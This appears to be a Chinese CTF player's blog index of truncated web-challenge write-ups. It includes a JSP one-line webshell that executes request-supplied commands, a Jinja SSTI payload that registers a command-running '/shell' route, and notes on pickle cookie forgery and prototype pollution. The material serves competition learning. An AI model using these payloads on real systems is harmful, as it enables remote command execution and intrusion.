2024 强网杯 web
2024 强网杯 web
最近有点忙 比赛题目好多都没复现 欸
最后做题情况如下
php
platform给了源代码
1234567891011121314151617181920212223242526<?phpsession_start();require 'user.php';require 'class.php';$sessionManager = new SessionManager();$SessionRandom = new SessionRandom();if ($_SERVER['REQUEST_METHOD'] === 'POST') { $username = $_POST['username']; $password = $_POST['password']; $_SESSION['user'] = $username; if (!isset($_SESSION[' ...
2024浙江省省赛
2024浙江省省赛 web初赛
这次比赛题目还是比较简单的 我上来就拿了两个血
可惜第三题使用xml加载内存马的时候 脑袋抽了没想出来 可惜了
最后第11名 欸可惜
easyjs
点名了存在原型链污染
污染id=1 的isAdmin为true就行 得到flag
这题不污染也行 乐
hack memory不知道应该干啥 扫一下
直接上传一句话就行
12345678910<% if("poc".equals(request.getParameter("pwd"))){java.io.InputStream in =Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();int a = -1; byte[] b = new byte[2048]; out.print("<pre>");while((a=in.read(b))!=-1){out.println(new St ...
2024强网拟态 web
2024强网拟态 web
我们A1natas最后获得了第30 感觉没希望进线下了 尽力了
不过开心的是我ak了web方向的题目
ez_picker/register存在原型链污染 可以污染任意的黑白名单
这里在register的时候 进行了merge操作
写个简单的demo
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960import sanicfrom sanic import text, Sanic, Request, responsefrom key import secret_keyapp = Sanic("test")users=[]safe_modules = { 'math', 'datetime', 'json', 'collections' ...
一些python RCE利用&&内存马
一些python rce利用&&内存马
有的时候会遇到 能ssti注入或者直接执行任意命令了 但是不出网同时没有回显 这个时候需要进一步操作的时候就比较麻烦
python内存马也不是一个很常见的东西 所以今天想着学习一下能任意命令执行的利用手段和内存马
flaskstatic_folder 任意文件读取flask在初始化的时候 会设置很多内部的属性
1234567891011121314151617181920def __init__( self, import_name: str, static_url_path: str | None = None, static_folder: str | os.PathLike | None = "static", static_host: str | None = None, host_matching: bool = False, subdomain_matching: bool = False, ...
Java UTF-8 Overlong Encoding
Java 编码绕过
上午台州市赛web做完闲逛的时候看到的 学习一下
UTF-8 Overlong Encodingutf-8可以将unicode的字符 通过某种计算转化成1-4位的字符 转化的逻辑如下
123456(十六进制) | (二进制)--------------------+---------------------------------------------0000 0000-0000 007F | 0xxxxxxx0000 0080-0000 07FF | 110xxxxx 10xxxxxx0000 0800-0000 FFFF | 1110xxxx 10xxxxxx 10xxxxxx0001 0000-0010 FFFF | 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
这样 通过更长的编码长度 可以表示不同的字符
在java反序列化的过程中 也体现了这一点 在ObjectinputStream#readUTFSpan中会把buf中的内容解码出utf-8编码的字符 调用栈如下
可以看到这里写出了不同情况下的处理方式
一字节的字符 ...
2024 SCTF 部分赛题
2024SCTF
好多没复现 水一下罢了 比赛的时候就做出了两道题
哭(QAQ)
ezRender在admin路由 存在ssti注入
但是这里要过一个waf和一个身份验证
先来看waf
123456789101112131415161718192021222324252627282930313233343536373839evilcode=[ "{%", "config", "session", "request", "self", "url_for", "current_app", "get_flashed_messages", "lipsum", "cycler", " ...
2024 Bytectf 记录
2024Bytectf
这次比赛 我们A1natas排名第17 可惜了没能进入决赛 就差一点
最近p事情太多了 又忙newstar又忙其他的 现在才有时间复现 写博客
ezobj(复现)给了源代码
1234567891011121314151617181920<?phpini_set("display_errors", "On");include_once("config.php");if (isset($_GET['so']) && isset($_GET['key'])) { if (is_numeric($_GET['so']) && $_GET['key'] === $secret) { array_map(function($file) { echo $file . "\n"; }, glob('/tmp/ ...
QL表达式注入
QL表达式注入依赖12345<dependency> <groupId>com.alibaba</groupId> <artifactId>QLExpress</artifactId> <version>3.3.2</version></dependency>
来自https://github.com/alibaba/QLExpress
使用123456789101112131415161718192021222324252627282930变量:使用$符号加上变量名的方式来引用变量,例如$age表示引用变量age的值。常量:支持整数、浮点数、字符串、布尔值、空值等常量类型,例如1、2.5、"hello"、true、null等。算术表达式:支持加减乘除、取余、取反等算术运算,例如1+2、3*4、-5等。逻辑表达式:支持与、或、非等逻辑运算,例如true && false、true || false、!true等。比较表达式:支持等于、不等于、大于、 ...
2024羊城杯 web
2024羊城杯 web这次比赛 在大家的努力下 我们A1natas最后排名第三
我也是成功的在晚上12点左右 侥幸ak了web
这次比赛被我非预期了好几题 笑死
Lyrics For You存在任意文件读取
可以读取config.key config.py等等
key的值是
1secret_code = "EnjoyThePlayTime123456"
存在pickle反序列化
直接伪造cookies就行
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768import osimport randomfrom flask import Flask, make_response, request, render_template# from cookie import set_cookie, cookie_check, get_cookieimport p ...
2024 巅峰极客初赛 web 部分wp
2024 巅峰极客初赛 web
感谢A1natas的小伙伴 这次我们A1natas 获得了第19名 决赛见
EncirclingGame签到 直接玩游戏就行 队友玩了会就穿了
GoldenHornKing贴一下payload
1lipsum.__globals__['__builtins__']['eval']("app.add_api_route('/shell',lambda:result ,methods=['GET'])",{'app':app,'result':lipsum.__globals__.get("os").popen("cat /flag").read()})
源代码如下
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515 ...